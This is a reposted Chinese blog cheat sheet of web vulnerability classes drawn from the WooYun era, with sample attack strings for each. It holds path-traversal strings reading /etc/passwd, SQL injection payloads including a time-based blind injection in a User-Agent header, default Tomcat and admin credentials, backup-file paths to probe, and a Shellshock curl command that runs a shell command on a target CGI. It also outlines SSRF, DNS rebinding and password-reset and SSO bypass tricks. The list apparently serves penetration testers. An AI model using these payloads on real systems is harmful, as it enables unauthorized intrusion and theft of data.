那些年 WooYun 的漏洞

Type:

  • 任意文件读取

    ../../../../../../../../../../etc/passwd%00
    /etc/sysconfig/network
    ../../../foo/../../../../etc/passwd   //nodejs
  • SQL注入

    and 1=2 union select 1,2,version(),3%23
    blind sqli
    error sqli
    宽字节注入
    框架注入(ThinkPHP)
    GET POST 参数
    伪静态  *
    Referer
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
  • 弱口令

    Username:中国姓名排行TOP500
    Password:admin  admin123 qyer           //字典的重要性!!!
    /manager/html  tomcat:tomcat
    ftp 弱口令  phpmyadmin 弱口令
  • 敏感信息泄露

    .bak  /.svn/entries  wwwroot.tar.gz .swp  web.rar %domain%.zip  %dictionary%.rar
    openssl
    目录遍历
    shodan
    github 敏感信息
    .NET 相关类 逆向解密 dll
    api 接口泄露
    社工库查询相关人员信息
  • 未授权访问

    RSYNC 匿名访问
    JBoss:/jmx-console/  /admin-console/
  • 命令执行

    CMS(discuz、)命令执行
    curl http://1XX.XX.XX.XX:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
    http://test.xxx.com:8082/struts_spy/example/HelloWorld.action //struts2
  • 任意文件上传

    cer、
  • SSRF

    url=           //ip服务
    DNS Rebinding 绕过
  • 设计缺陷

    验证码可识别
    水平越权,修改相关参数
    任意用户邮箱地址查询:修改对应查询参数
    任意密码重置:验证身份token简单可爆破
    单点登陆绕过:其它参数替代绕过

转载于:https://www.cnblogs.com/skrr/p/10987425.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值